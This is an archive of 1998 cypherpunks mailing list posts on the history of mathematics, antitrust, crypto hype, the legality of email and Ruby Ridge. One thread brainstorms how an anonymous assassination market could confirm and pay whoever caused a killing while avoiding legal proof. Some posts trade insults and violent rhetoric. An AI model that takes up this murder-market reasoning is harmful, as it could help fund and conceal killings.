the fact that Halley didn't have 3 sightings he couldn't use the standard
orbit calculations. By using calculus, which Newton had invented and Halley
didn't know, it was possible to calculate an envelope of orbits. Haley then
researched records of sightings and determined that only one comet with a
75+ year orbit could be it. If Newton was so unknown from not publishing why
did Halley even care to ask Newton?

Halley was a pretty notable character in his own right. He was given a ship
to do the first magnetic map of the N. Atlantic, he called it 'Paramour
Pink' (Pink Lover). He and the prince of Russia would also push themselves
around London in a wheelbarrow drunk as skunks...



    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Fri, 9 Jan 1998 17:54:16 +0800
To: matrix@meganet.com
Subject: a good example of bad crypto hype
Message-ID: <199801090825.JAA16425@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>at http://www.meganet.com/explain.htm
>you can test your critical thinking skills...

Bawahahahaha. That's the biggest bunch of complete bullshit I've read in
years. Thanks, Meganet, you made my night. They must be smoking crack and a
lot of it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 9 Jan 1998 23:09:56 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801091529.JAA08683@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

 Forwarded message:
 
> Date: Fri, 09 Jan 1998 00:01:22 -0800
> From: Blanc <blancw@cnw.com>
> Subject: Re: rant on the morality of confidentiality (fwd)
 
> " His deepest instincts were occult, esoteric, semantic - with profound
> shrinking from the world, a paralyzing fear of exposing his thoughts, his
> beliefs, his discoveries in all nakedness to the inspection and criticism
> of the world.  'Of the most fearful, cautious and suspicious temper that I
> ever knew', said Whiston,

Sorry, I didn't think of this before...

Did either Keynes or Whiston happen to mention that Newton was an alchemist?


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Sat, 10 Jan 1998 02:22:06 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality (fwd)
In-Reply-To: <v03102801b0db59b6282a@[207.167.93.63]>
Message-ID: <3.0.5.32.19980109093824.007acbb0@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



At 12:42 AM 1/9/98 EST, Dr.Dimitri Vulis KOTM wrote:
>Timmy May <tcmay@got.net> demonstrated his ignorance and stupidity by
writing:
>
>>
>> At 6:01 PM -0800 1/8/98, Jim Choate wrote:
>>
>> >Don't be confused by Timy's claim to be a scientist, he is a
technologist at
>> >heart. Many of his views and beliefs are motivated by issues of control
*not
>> >curiosity.
>> ....
>> >You don't know Timmy very well do you...
>>
>> Add Choate to the list of dimbulbs who think calling me "Timmy" (or Timy)
>> is some kind of witty insult. On this list, Detweiler and Vulis seem to
>> favor this usage.
>
>I like to call Timmy "Timmy" necause it's fun to watch Timmy twitch.

Didn't you have siblings to taunt as an adolescent?  Didn't your mother
tell you its not attractive?  Haven't you learned that jabs at ideas
are not the same at jabs at the person?







------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	Directorate of Intelligence, CIA
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Sparkes <isparkes@q9f47.dmst02.telekom.de>
Date: Fri, 9 Jan 1998 17:56:08 +0800
To: cypherpunks@ssz.com
Subject: Re: Silly Shrinkwrapped Encryption
In-Reply-To: <v03110710b0d9f850d94d@[207.94.249.133]>
Message-ID: <3.0.2.32.19980109094653.006a7a4c@q9f47.dmst02.telekom.de>
MIME-Version: 1.0
Content-Type: text/plain



>Lotus made not secret of their GAK implementation in Notes. If the Swedish
>government bought Notes anyway, they have only themselves and the
>incompetence of their IS people to blame.
>
>Now they have to scrap a recently fielded system. Though luck. Better
>solutions than Notes were out there and easily to be found by the most
>casual buyer.
>

People buy Notes for the databases - the mail is just a freebie for most, a
bit like the radio in your car. The mail's not even very good (adequate at
most).

Anyone know if the databases are encrypted with the same GAK scheme?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Sat, 10 Jan 1998 02:22:39 +0800
To: Ryan Lackey <honig@otc.net>
Subject: Re: Jim Bell... lives... on... in... Hollywood!
In-Reply-To: <David Honig's message of Thu, 08 Jan 1998 09:21:08 -0800>
Message-ID: <3.0.5.32.19980109094914.007b36b0@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



At 08:28 AM 1/9/98 -0500, Ryan Lackey wrote:
><daemon@ATHENA.MIT.EDU> (David Honig) writes:
>
>> 
>> I agree, but "contribute to death" needs to be operationalized.  Here's a
>> proposal:
>> If a homicide suspect is arrested within N months, they will be isolated
>> from the net
>> and the owner of the winning ID will have to perform a challenge-response.
>> Since
>> the suspect couldn't have replied, they are different; if a pair
>> collaborated, well,
>> when a hit man is caught, his payoff matrix will usually make him turn in
>> the client.
>
>Given strong cryptography and something like my current Eternity DDS
>almost prototype (a reliable distributed way of selling 
>storage-compute-bandwidth being the relevant part), why couldn't the 
>incarcerated person have left an agent out on the net to handle the 
>challenge for him, and hold the money in anonymous trust for him until
>he gets out?  I can't think of any anonymity-preserving system which 
>contains an "is-a-person" predicate -- even if you asked an AI-hard
>question, you could blind the question and post it to usenet or CNN
>or something and quote one of those responses (which would be wise to
>do anyway for styleometry prevention).
>
>The other option is having a non-anonymous system, or one that is
>anonymous until someone tries to collect the prize, but in that case,
>it's not all that interesting a problem.
>
>Ryan the Nightshifted
>-- 
>Ryan Lackey
>rdl@mit.edu
>http://mit.edu/rdl/		
>

I think this gets into legal issues.  Consider fraudelent insurance and
gambling schemes
involving collaboration -illegal, but hard to detect unless someone turns.
Consider a hit man who takes the fall for the boss, so that his family 
is taken care of.  

In these cases and in an AP scheme, the law can't prove much if 
certain parties collaborate.  Maybe the winner of the
"BATF agents blown up in 97" bet *is* John Doe III; but since
the investigation claims no such person, and the winner is not
in jail now, the winner has fairly earned their reward
via their skill in actuarial matters.




------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	Directorate of Intelligence, CIA
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 10 Jan 1998 02:10:03 +0800
To: cypherpunks@cyberpass.net
Subject: Re: In God We Antitrust, from the Netly News
In-Reply-To: <Pine.LNX.3.95.980109121508.5169B-100000@vorlon.mit.edu>
Message-ID: <v03102800b0dc148aaea5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:15 AM -0800 1/9/98, Declan McCullagh wrote:

>In God We Antitrust
>by Declan McCullagh (declan@well.com)
>
>        Bill Gates likes to portray himself as a businessman hounded by
>   hordes of boorish bureaucrats who resent his success. "It's absolutely
>   clear that our competitors are spending an enormous amount of time and
>   money trying to whip up anti-Microsoft sentiment in Washington, D.C.,"
>   says spokesman Mark Murray. "For the past year, Netscape, Sun and
>   other competitors have been crawling all over Washington, D.C., trying
>   to use the government as a weapon against Microsoft -- rather than
>   competing head-to-head in the marketplace."
>
>        Of course, that's what you'd expect a PR flack to say, whether
>   it's true or not. But maybe, just maybe, Microsoft has a point.

Of course they have a point. CNN reported yesterday that "popular
sentiment" is shifting *against* Microsoft, that they are losing the war of
words with Our Friend, The Government.

The sheeple believe what the Government media machine spews.

The "ganging up" on MS is the ganging up on anyone who is too successful
and who doesn't play the game properly.

(Some of us have already commented on how Microsoft's failure to tithe
enough to the political machines may have something to do with their
problems. Ironically, many companies have been indicte *bribery* charges
(e.g., Lockheed, others) for doing what the political machines in Amerika
expect to be done...only we call the bribes "voluntary" donations...sort of
a political campaign version of "mandatory voluntary.")

The next such battle will be about Intel, which, if anything, has even more
of a commanding presence in the market than MS has. Besides
"investigations" (a DC codeword meaning: "donate money to the ruling
party"), the antitrust buzz is that the Intel-DEC deal may be scotched.

Intel's failed competitors (Cyrix, AMD, Motorola, Sun, SGI/MIPS,
Intergraph) can be counted on to run crying to Mother Government, crying
that Intel is too successful.

A truly fucked up country. We need to cut the head off the beast.

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 10 Jan 1998 00:54:39 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality (fwd)
In-Reply-To: <199801090731.BAA07695@einstein.ssz.com>
Message-ID: <DZP2ie1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:

> > From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> > Date: Thu, 08 Jan 98 23:45:25 EST
> > 
> > Janos Bolyai was the son of the math professor Farkas B. in Buda(best).
> 
> Who also worked with Gauss and probably beat Gauss to any solution to the
> problem of non-euclidean geometry (see Kurzer Grundriss eines Versuchs, 
> p. 46).

I'm sorry, I don't have the time to look this up. If you're trying to prove
that Gauss was not a nice person, I don't believe it. And if the best
argument you can make is to cite Bolyai's claims that Lobachevsky was not
a real person but a "tentacle" of Gauss, created to persecute Bolyai
(gee, that sounds vaguely familiar...), and you can't find any more dirt
on Gauss, then it proves to me that he was indeed a remarkably nice person.

Gauss rose from poverty to become one of the premier mathematicians of
his time - in the era when sciences were considered a hobby suitable
only for the noble-born and wealthy.  Gauss did a lot to help other
people in many ways, both as individuals, and in targeting his research
to solve practical problems for good of the humanity.

I was very fortunate to have met Paul Erdos and some living people whom
I regard as mathematicial geniuses (not necessarily on par with Gauss);
without exception their talents make them wonderful helpful people.

You also haven't explained how Bolyai could have been Gauss's school friend,
being 25 years younger.

Crypto-relevant stuff: In 11-17 centuries, mathematicians who weren't 
independently wealthy, made their living by selling their service to/as 
"reckoners" (computers), accountants, bookkeepers, and astrologers.
There was, you may recall, a similar dispute between Tartagla and some
other Italian about who first discovered the formula for roots of 3rd 
order polynomials. This problem had some use in computing the internal
rate of return (a practical accounting problem of interest at that time),
but the main reason why each wanted to claim priority was for marketing
reason: being its inventor would have enhanced their reputation and allowed
them to charge higher fees or to get new clients for their bookkeeping
businesses (because that's what they did for a living).

So, the following technique emerged and was widely used by mathematicians
at that time to claim the peiority. They would write out their result (or
the proof); they would make an anagram, or take the first letter of each
(latin) word, etc; and they would mass-mail it to every mathematician they
knew, so they'd receive it at about the same time; then they'd publish it
at leisure, knowing that once they decode the anagram or publish the proof
whose first letters coincide with their broadcast, it will be evident that
they had it on the date it was first mailed, yet they haven't revealed
enough information for anyone to steal the result.

The nice folks in goettingen who kept publishing Gauss's papers up until WW2
found that he too came up with a non-Euclidean geometry in 1818 (when Bolyai 
was 16 years old). They did not report finding any communications from Bolyai
to Gauss about non-euclidean geometry in that time frame. Unfortunately if
Bolyai makes the claims that he communicated his results privately to Gauss
and that Gauss then concocted a tentacle named Lobachevsky, who's not a 
real person, then I have to discard the entire claim as a figment of his
psychotic imagination.
> 
> > arises if you omit this axiom. According to my sources, the appendix
> > is "Wronski-like" to the point of unreadability. Apparently no one
> > actually read it until B. started arguing about who did what first.
> 
> Both John Bolyai's "The Science of Absolute Space" and Nicholas
> Lobachevski's "The Theory of Parallels" are included in Roberto Bonola's
> "Non-euclidean Geometry" (Dover, ISBN 0-486-60027-0 $5.50). I certainly had
> no problem reading the 3 combined books.
> 
> I was just looking at the translators notes to Lobachevski, it was done
> by George Bruce Halsted of 2407 San Marcos St, Austin, Tx. May 1, 1891.

What's your point?  Are you suggesting that Lobachevsky first published it that
year?  He was long dead by then.  He first gave a talk on non-euclidean
geometry in 1825 and published the seminal paper in 1829 - before Bolyai's
work was published in 1832 as an appendix to his father's textbook.
Bolyai saw the German translation of Lobachevsky's paper in 1840.
Are you trying to say that a paper's not really published until it's
translated into english by some guy in Texas? :-)
> 
> > well accepted by his peers. Neither Bolyai nor Lobachevsky knew about
> > Gauss's work.
> 
> Not true, Bolyai wrote him several letters as described in his book and the
> various prefaces. Lobachevski's book was promoted by Gauss as the first and
> truely critical work on non-euclidean geometry. In a rare show of magnamity
> Gauss even admits that Lobachevski's work exceeded his own.

What exactly is your beef with Gauss promoting Lobachevsky?

When Lobachevsky's paper reached Europe, the "consensus" (I hate consensuses)
among the working mathematicians was that non-euclidean geometry was nuts.
Incidentally, Bolyai was among the people screaming that it was all wrong
and renouncing his own 1832 publication. Gauss could have announced that he
came up with the same results before Lobachevsky, but never bothered
to publish them. Gauss could have also announced that he's gone through
Lobachevsky's papers and endorses the results. His reputation capital was
such that either claim would have been accepted by the mathematical
community. He did neither. He endorsed Lobachevsky's paper as being
sufficiently interesting to be translated and studied and checked; perhaps
he himself was not sure that it was error-free. He also pushed for
Lobachevsky's election into the Hannover academy of sciences - not just
for the non-euclidean theory, for for his many other interesting results.
Gauss also promoted many other people who did outstanding mathematical work.

There wasn't a "consensus" that non-euclidean geometry was kosher until
about 1865, by which time all 3 were dead or retired.

Likewise when Kantor first announced that the infinite number of real numbers
is greater that the infinite number of integers, the "consensus" among working
mathematicians was that this was crazy.

Likewise when a certain well-known Dutch mathematician mass-mailed many
people a few years ago announcing that he's been having sex with the mother
goddess, the "consensus" was that he's gone nuts.

Finally, if Gauss said that Lobechevsky's paper was more complete and 
detailed than Gauss's unpublished notes from 1818, it may very well have
been true.

> 
> > I have no idea what Bonola wrote, but if he's just repeating the allegation
> > Bolyai made about Gauss while suffering from depression and paranoia, they
> > have no more truth in them than the Timmy May rants on this mailing list.
> 
> He wrote a classic work on non-euclidean geometry that was quite popular in
> 1912 when it was printed.
> 
If the book repeats the bizarre claims made by Bolyai, when he was paranoid,
depressed, and outright psychotic - such as the claim that Lobachevsky
was not a real person, but a "tentacle" of Gauss created to torture
Bolyai - then it's not worth reading. Sadly, some people do go insane.
Trying to find the truth in their paranoid rants is a waste of time,
just like reading Timmy May's rants is a waste of time.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Sat, 10 Jan 1998 02:54:59 +0800
To: Ray Arachelian <cypherpunks@toad.com
Subject: Re: waco trail / german bugs -- from spyking list
In-Reply-To: <Pine.SUN.3.96.980109124535.21072A-100000@beast.brainlink.com>
Message-ID: <3.0.5.32.19980109104802.007be1e0@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



At 12:47 PM 1/9/98 -0500, Ray Arachelian wrote:
>15)From: SpyKing@thecodex.com
>Subject: Re: Deadly Physical Force
>
If this guy IS
>convicted the rules of engagement change forever... SWAT teams will have
>to think twice before firing into dwellings... 
>
>FBI sniper ordered to stand trial in Ruby Ridge case


The rules for an Assault/Entry are different than the rules for a Sniper, I
think.
That is the issue: a sniper must know what they are shooting at.


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	Directorate of Intelligence, CIA
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Sat, 10 Jan 1998 00:14:03 +0800
To: "'cypherpunks@Algebra.COM>
Subject: RE: Question on U.S. Postal Service and crypto
Message-ID: <6B5344C210C7D011835C0000F80127668B15D4@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain



My understanding is that a post BOX has to be a design acceptable to the
USPS; and that no one else can put things INTO it. This is a pretty
narrow 
restriction; door slots can be used by anyone for anything, and many 
postboxes either share a support post with a newspaper delivery tube or
have an external rack for stuffing newspapers, etc.

Back about 20 years ago, some company (FedEx, UPS????) tried to
get into the first class mail delivery business, and they dealt with
this by
putting mail in a plastic bag and hanging it on the doorknob.

Where I live (*small* town in New England), FedEx and UPS regularly
leave
packages unattended; either by the front door, the back door, or in the 
garage (this is a very low crime area).

Around 1979, when the existence of email was just beginning to penetrate
(there where only a few hundred thousand people on the Arpanet), there 
was considerable debate over the legality of email. Since access to
Arpanet was theoretically only for people working on Federally funded 
projects, it was widely thought that it should only be used for project 
related work, and any personal mail was a misuse of government funds.
Columbia University (where I was working at the time) allowed unlimited 
internal use, but had tinkered their mail client to ignore addresses to 
off-campus addresses. I think my very first hack involved defeating 
this restriction.

About the same time, I remember that the Postal Carriers Union realized 
(quite correctly) that email was a threat to their civil service jobs,
and came
out with a statement to the effect of 'We don't quite understand what
this thing 
is, but the USPS owns it." They wanted to require that email be received
only at Post Offices, where it would be printed, stamped, and delivered
(by
one of their members) along with the rest of the mail.

Peter Trei
ptrei@securitydynamics.com



> ----------
> From: 	Brian B. Riley[SMTP:brianbr@together.net]
> 
>  Maybe they are confusing an electronic mailbox with a snailmail box
> ... 
> the USPS has always contended that they (the USPS) "own" your mailbox
> and 
> use that criterion to prosecute people who drive around putting things
> 
> like circulars etc in mailboxes. Maybe they we on a role thinking that
> if 
> they got into the e-mail business they would 'own' that piece of your 
> hard drive so to speak.
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 10 Jan 1998 01:09:49 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801091729.LAA09084@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: rant on the morality of confidentiality (fwd)
> From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Date: Fri, 09 Jan 98 10:24:24 EST

> I'm sorry, I don't have the time to look this up. If you're trying to prove
> that Gauss was not a nice person, I don't believe it.

Anyone who would tell their dying wife, via their son, to wait a moment
until he had finished his calculations is not a nice person.

> argument you can make is to cite Bolyai's claims that Lobachevsky was not
> a real person but a "tentacle" of Gauss, created to persecute Bolyai
> (gee, that sounds vaguely familiar...), and you can't find any more dirt
> on Gauss, then it proves to me that he was indeed a remarkably nice person.

What the hell are you talking about here? I made no such claims at all.

Lobashevski was the first person to write in modern history on non-euclidean
geometry. Gauss was a contemporary and was quite familiar with Lobashevski's
work. He was even asked to review "The Theory of Parallels". Gauss, in an
uncharacteristic act, even admitted that Lobachevski's work had progressed
farther than his own.

> only for the noble-born and wealthy.  Gauss did a lot to help other
> people in many ways, both as individuals, and in targeting his research
> to solve practical problems for good of the humanity.

Gauss did a lot of harm as well. He characteristicaly denied works of others
and trivialized their contributions while at the same time promoting his
own. He was prone to bouts of drunken anger and is known to have physicaly
attacked quite a few people while in that state. His usual treatment of
contemporaries was based on contempt, not respect.

> You also haven't explained how Bolyai could have been Gauss's school friend,
> being 25 years younger.

Bolyai's father worked with Gauss (as I explained) and his son John also
worked with Gauss from the time he (Bolyai) was in school; not Gauss.

I am going to refrain from going on with the remainder of your 'points'.
You have strayed so far afield, as usual, or misconstrued comments that it
has no relevance to what the original discussion was about, which was science
advances when people publish and share their work - not when it is held back
and unpublished.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 10 Jan 1998 04:18:46 +0800
To: Ryan Anderson <ryan@michonline.com>
Subject: Re: In God We Antitrust, from the Netly News
In-Reply-To: <v03102800b0dc148aaea5@[207.167.93.63]>
Message-ID: <v03102800b0dc2d3e93db@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:01 AM -0800 1/9/98, Ryan Anderson wrote:
>On Fri, 9 Jan 1998, Tim May wrote:

>> Intel's failed competitors (Cyrix, AMD, Motorola, Sun, SGI/MIPS,
>> Intergraph) can be counted on to run crying to Mother Government, crying
>> that Intel is too successful.
>
>Failed? AMD is farfrom a failed competitor.  Intel is nowhere near being a
>monopoly.  In this industry,Intel creates a chip, then AMD,Cyrix, etc take
>the published specs on that chip and duplicate the work.  They same some

Charitably, I'll assume you just don't follow the industry very closely. I
don't mean in terms of claims and press announcements, I mean in terms of
the "ground truth" of what is real.

Intel conservatively is now two full iterations ahead of AMD/Nexgen and/or
National/Cyrix. The AMD K6 may not be quite the dog the K5 was, but AMD is
woefully unable to *make* the part!

(Manufacturing is more essential than most people realize. I could
elaborate on this for pages and pages, but this is well-trod ground in,
say, the Silicon Investors Forum and other such groups.)

There have been reliable reports, from several kinds of sources, that AMD's
Fab 25 in Austin is yielding only a handful of workingn (at speed) K6s per
8-inch wafer, versus well over 100 working (at full rated speed,
importantly) Pentium IIs (and variamts) devices per 8-inch wafer. Intel is
running at a nearly perfect yield rate (most die are functional, a very
nice position to be in, and a very hard one to arrange).

Intel also has about an order of magnitude more clean room space capable of
making the Pentia (and Merced and Gunnison, etc.) than AMD has in Fab 25.

("Fab 25," by AMD's naming convention, means the fab opened in the25th year
of business, not their 25th fab.)

>effort from having to make opcode decisions, but then they don't get first
>crack at the market.  AMD has a *Very* good chip in the K6, receiving much
>attention as being a serious competitor to Intel's chips.

Well, look at their profits, Ryan! Go to Yahoo and look at both their
earnings reports over the last, say, 5 years. Also look at their stock
patterns.

AMD is now trading at $18. Five years ago it was trading at the same price.
In fact, it's been a narrow range between about 20 and 30 for most of that
time, briefly blipping up to 40 before dropping back to the level it was
half a decade ago. In fact, it's where it was in 1983, 15 years ago. (Check
the charts.)

Meanwhile, Intel has moved from $15 to $72 (today's price) in 5 years, and
from something like $2 (or less, as the charts don't go back to '83 for
Intel), up a factor of 30 or more times.

Market caps are similarly skewed. Intel's market value is $120 billion,
AMD's is $2.5 billion, a factor of 50 times lower. (They were within a
factor of 3 of each other 15 or so years ago.)

The problem AMD faces is not the adequacy of its design, "borrowed" from
Intel, but its inability to compete in manufacturing costs.

Even as AMD struggles to get yields up, and struggles to invest in the next
generation of production equipment, Intel is building several new $2
billion fabs, all equipped with the latest equipment.

(Intel continued to book orders for production equipment through the last
mini-downturn in '95-'96, ordering equipment from Applied Materials, Lam
Research, and so on. Guess what? When AMD and other small fry decided it
was time to order, pronto, they found that the Applied Materials, etc.
production was already committed to go to Intel! Jerry Sanders, top guy at
AMD, cried "foul," but the fact was that Intel's enormous financial and
market position strength allowed it to plan ahead and order the equipment
and manufacturing space they'd need.)

I have no doubt that some companies will design in the K6, and even the
Cyrix version. I would if I were them, if only to put some pricing pressure
on Intel.

But the market share of Intel, at something like 90% (I won't dissect the
various segments, but they range from 80% to 95%), and the huge costs to
compete in the _next_ generation, really makes it almost impossible for
small fry like AMD and Cyrix to do anything significant. Even if their
yields were significantly higher than Intel's, which is technically
impossible, their lack of capacity limits the inroads they can make.

And my point is a larger, longer-range one. I haven't said I expect Justice
Department action this year, or even next.

But if Intel's Merced displaces workstation chips (the DEC deal, Sun to
work on a competitive Solaris for Merced, the H-P/Intel alliance, and
several other major deals), and if AMD and Cyrix are unable to make a dent
in Intel's market share for PC chips, and if the motherboard integration
continues (with Intel supplying motherboards that competitors can't readily
match the peformance and pricing of), then I expect a Democratic Justice
Department to move on Intel.

Of course, those who feel AMD and Cyrix are about to knock Intel out of its
present position have the best of all ways to vote their beliefs: by buying
AMD (or National/Cyrix) stock at the current low prices.

I wish you luck, really.

--Tim May



The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@vorlon.mit.edu>
Date: Sat, 10 Jan 1998 01:25:28 +0800
To: cypherpunks@cyberpass.net
Subject: In God We Antitrust, from the Netly News
Message-ID: <Pine.LNX.3.95.980109121508.5169B-100000@vorlon.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Fri, 9 Jan 1998 11:57:07 -0500
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: FC: In God We Antitrust, from the Netly News

************

http://cgi.pathfinder.com/netly/opinion/0,1042,1678,00.html

The Netly News (http://netlynews.com/)
January 9, 1998

In God We Antitrust
by Declan McCullagh (declan@well.com)

        Bill Gates likes to portray himself as a businessman hounded by
   hordes of boorish bureaucrats who resent his success. "It's absolutely
   clear that our competitors are spending an enormous amount of time and
   money trying to whip up anti-Microsoft sentiment in Washington, D.C.,"
   says spokesman Mark Murray. "For the past year, Netscape, Sun and
   other competitors have been crawling all over Washington, D.C., trying
   to use the government as a weapon against Microsoft -- rather than
   competing head-to-head in the marketplace."

        Of course, that's what you'd expect a PR flack to say, whether
   it's true or not. But maybe, just maybe, Microsoft has a point.

        A close look at the history of antitrust law reveals that its
   enforcement has always been political. The demand for antitrust
   regulations in the first place came from midwestern butchers who
   wanted to block competition from more efficient meat-packing plants in
   Chicago. Since then, execution of the 1890 Sherman Act has been highly
   partisan: Democratic administrations are nearly twice as likely to
   bring antitrust cases as Republicans. Antitrust regulations are also
   protectionist: Regulators wield them to protect domestic companies
   from overseas competitors.

        If it's politics and not policy that prompted the Justice
   Department to assail Microsoft this time around, the paper trail may
   not become public until well into the next century. For now, though,
   we can look at antitrust history instead:

        ITT and Nixon: President Richard Nixon intervened in an antitrust
   action against International Telephone & Telegraph in 1971 in exchange
   for a bribe -- a hefty contribution to the 1972 Republican convention.
   "I don't know whether ITT is bad, good or indifferent," he said on
   April 19, 1971, White House tapes reveal. "But there is not going to
   be any more antitrust actions as long as I am in this chair... goddamn
   it, we're going to stop it."

[...snip...]



--------------------------------------------------------------------------
POLITECH -- the moderated mailing list of politics and technology
To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
subscribe politech
More information is at http://www.well.com/~declan/politech/
--------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Sat, 10 Jan 1998 01:51:07 +0800
To: cypherpunks <cypherpunks@toad.com
Subject: waco trail / german bugs -- from spyking list
Message-ID: <Pine.SUN.3.96.980109124535.21072A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



15)From: SpyKing@thecodex.com
Subject: Re: Deadly Physical Force

This thread might be getting tired but I ran across something that is
applicable. I make no judgement on who is right or wrong. I was not there
and only those who were know the truth. I'm posting this to show that
despite being acquitted in one court the shooter in this case is being
charged and brought to trial in another court on similiar charges. Some
will scream double jeapordy and others will say justice is prevailing. The
jury will have to decide... but I'll say one thing... If this guy IS
convicted the rules of engagement change forever... SWAT teams will have
to think twice before firing into dwellings... 

FBI sniper ordered to stand trial in Ruby Ridge case

BONNERS FERRY, Idaho (Reuters) - An FBI sharpshooter has been ordered to
stand trial on charges of involuntary manslaughter over the 1992 standoff
at Ruby Ridge, Idaho, in which three people died, prosecutors said
Wednesday. 
         
Idaho Magistrate Quentin Harden ruled there was enough evidence to allow
the sharpshooter, Lon Horiuchi, to face trial on charges he acted with
negligence when he fired a shot that killed the wife of white separatist
Randy Weaver at his cabin. 
    
The standoff near Weaver's cabin turned into a rallying cry for extreme
right-wingers who condemned what they saw as federal government excesses
and held up Weaver as a hero. 
    
Boundary County prosecutor Denise Woodbury last August charged Horiuchi
and Weaver's friend Kevin Harris with the deaths of two people killed in
the standoff. The charges against Harris were later dismissed on the
grounds that he had already been acquitted of those charges in federal
court. 
 
In filing charges against Horiuchi, Woodbury accused the sharpshooter of
